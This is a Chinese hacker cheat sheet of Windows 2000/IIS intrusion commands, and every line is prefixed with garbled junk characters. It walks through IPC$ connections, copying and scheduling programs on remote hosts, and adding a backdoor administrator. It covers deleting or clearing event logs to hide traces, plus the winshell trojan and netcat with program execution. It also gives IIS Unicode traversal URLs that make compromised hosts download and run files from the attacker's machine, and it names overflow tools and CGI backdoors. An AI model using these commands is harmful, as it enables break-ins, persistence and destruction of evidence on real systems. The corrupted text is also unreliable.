网管和黑客都必须知道的命令
<���xeB��9 常用的几条NET命令:
F1BvDplQ>G �NpGi3>��5 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�8B-PsS|' V��fzy�BjQ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
?�<�.a>�"! $s=` {�v�v (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�h{��7>>�� X�E_Lz2�H` (查看远程主机时间) net time \\IP地址
EX�e�V�@kg #a�kJhy@m$ (定时启动某个程序) at \\IP地址 02:18 readme.exe
Xbm��sq,*] M{orw;1Isy (查看共享) net view \\IP地址
yH��E��\Q j xI;cl��r (查看netbios工作组列表) nbtstat -A IP地址
�rN�hS\1�- rF[-�4t
�% (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
&i�3SB�[|� sHPAr�}1�4 (这两条把自己增加到管理员组): net user 用户名 密码 /add
GmNC��w5F �>x%HqP#_V net localgroup Administrators 用户名 /add
(7<�G1$:z= {�i=V:$_#� (断开连接) net use \\IP地址\ipc$ /delete
�\��y271}' #f�(tzPD�� 扫尾:
T\��Xf�0|y 8Ys)q�x>7' del C:\winnt\system32\logfiles\*.*
}.�D�18bE( >|�R�oL�V del C:\winnt\ssytem32\config\*.evt
MPnMLUB$\ *PlKl_n�P6 del C:\winnt\system32\dtclog\*.*
:�j~4mb�?$ ;Eg��l8Vhr del C:\winnt\system32\*.log
��6I(Y<LZ5 �Q[3hOFCX� del C:\winnt\system32\*.txt
,5<AV K-#Q �`vz�MuL�; del C:\winnt\*.txt
+p�S�o(e�( !otseI!!/� del C:\winnt\*.log
7_3
PM
3C �8�>j&) @q 一、netsvc.exe
1E!.E=Y�?M �6H2�Bf*�i 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
-}4CY\d�6' z l`m1k�-X netsvc /list \\IP地址
;yq�Ht�!�N sK�W~+���] netsvc schedule \\IP地址 /query
�{�9;-5@b� �tkm@&e=e% netsvc \\IP地址 schedule /start
E3p$^�['vx �W�Y�RC_U7 二、OpenTelnet.exe
eK(k;$4\^Y {~�]5QK�g. 远程启动主机的Telnet服务,并绑定端口到7878,例如:
3d;J"e+?�� w�KdWE`|y OpenTelnet \\IP地址 用户名 密码 1 7878
6K7lQ!�#}Q h3E}Sa(MQ: 然后就可以telnet到主机的7878端口,进入DOS方式下:
�l�GK7XAx, �� 7Oe$Ou� telnet IP地址 7878
z7BFkZ6�+� C�8��v���� 三、winshell.exe
^�& *;]S` *G�YLj���[ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
"D�>/#cY1/ S=kO9"RB]� p Path (查看winshell主程序的路径信息)
d�m"�x?[2: )$�1j"m��V b reBoot (重新启动机器)
z|],�s]F>G -�]}#Z:&�� d shutDown (关闭机器)
lmUCrs�3�7 /ho7~C+H*e s Shell (执行后你就会看到可爱的“C:\>”)
�#X���``^
�7g�Ou|�t� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
1H�hr6T^)� uj\�&-9gEi CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�4Vv�E(f�� 0FL'8!��e< 四、3389登陆器,GUI方式登录远程主机的
�%L�)�QTv/ )mAD�<y��+ 五、elsave.exe
JgHY�uL��B 3&E@#I^]�, 事件日志清除工具
ID�F�0n�x] �.��
�WJ� elsave -s \\IP地址 -l "application" -C
Q�~�N�q�5[ +B8oW3v# ) elsave -s \\IP地址 -l "system" -C
e\aW~zs��2 ;B2�&#kot7 elsave -s \\IP地址 -l "security" -C
r�Ft�+Y}�) ro�?.w���� 执行后成功清除应用程序日志,系统日志,安全日志
S{��F\_'%� �pHoxw|'Y 六、hbulot.exe
FeZW�S>N� )#4(4
@R h 开启win2kserver和winxp的3389服务
j�C:���D�> N0��$
uB"� hbulot [/r]
d���j9i*#F uk���W�L3 使用/r表示安装完成后自动重起目标使设置生效。
n]3�'�N�58 Q$:�,N=%� 七、nc.exe(netcat.exe)
�.#s�X|c=W GHLFn~z@XJ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
sA���A;d�� BuA�zO�>�= 想要连接到某处: nc [-options] hostname port[s] [ports] ...
!�jE�V75� ��0S+$l��� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
dEkS�T[�Y3 Ed;!�A(64r 参数:
zA|lbJz=GY �9' ��H\-� -e prog 程序重定向,一旦连接,就执行 [危险!!]
W:WRG8�(�F 3 %r*~#n�z -g gateway source-routing hop point[s], up to 8
�4�5Zh�8�k :��.BjJ2[S -G num source-routing pointer: 4, 8, 12, ...
; %AgKg�V
Rq�",;,0ZJ -h 帮助信息
MVQ6I�/EA4 =�D?�HL?�� -i secs 延时的间隔
z�muR�n4Nv M�YxuQ�|�w -l 监听模式,用于入站连接
DuAix)#FN9 o��9M���r7 -n 指定数字的IP地址,不能用hostname
�� -y��_q� 6r�%��i=z -o file 记录16进制的传输
���Hi\z-P- c�":2<�:D& -p port 本地端口号
.�W;cz8te `�x#��}c�o -r 任意指定本地及远程端口
kDR5�kDiS y fu���H�� -s addr 本地源地址
�it>l?h7�I
H8�@z�/�� -u UDP模式
��X$�t!g` j+�l�cj&V# -v 详细输出——用两个-v可得到更详细的内容
�r>KmrU�4Q � C�!v%6[� -w secs timeout的时间
BGH'&t_5�� KG(l=?� �N -z 将输入输出关掉——用于扫描时
2}�.~
6EU/ 八、TFTPD32.EXE
U? U3?Y-k` X
g7xy>{]� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
<?;KF2A�({ PR�y�z�vc~ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
V�ggS��Db� J5�f}�-W@ 然后可以直接令文件运行:
{SZ�v#Mr�K UpQ�da`�rb http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
cV`NQ�t�<W v$;U�RF%�^ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
a�7b1�c�!� U:���
��<� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
J*%IvRg
3F6A.N�y
一、一 Xscan命令行运行参数说明:
&`]T#��">� RA+�M�.��� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�X}QcXc.�d [o�X�r6M:� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
@L607[�!�? �Sq2� 8=1% xscan -file <主机列表文件名> <检测项目> [其他选项]
%l%2 h�vGZ ?d3<GhzlR3 其中<检测项目> 含义如下:
i_!$bk<�yo ^�H&`e"|R9 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
VGC��d)&s� &[��PA?#I` -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
E3CwA�8)k �K�NF{NFk� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
<
jX5}@`z *xx)�j:Sc2 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
r�0\�C2g_X {8�;}�y[R -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
��B�1�Z��; �-�"�� �r4 [其他选项] 含义如下:
�Gb�kD�s�- Vhn��Ir#L+ -v: 显示详细扫描进度
{?cF2K#��� x'Nc��}�� -p: 跳过Ping不通的主机
Z;�dR�:|%) 0��d�0ga^O -o: 跳过没有检测到开放端口的主机
k
$# ,^)T uE��%2kB*] -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
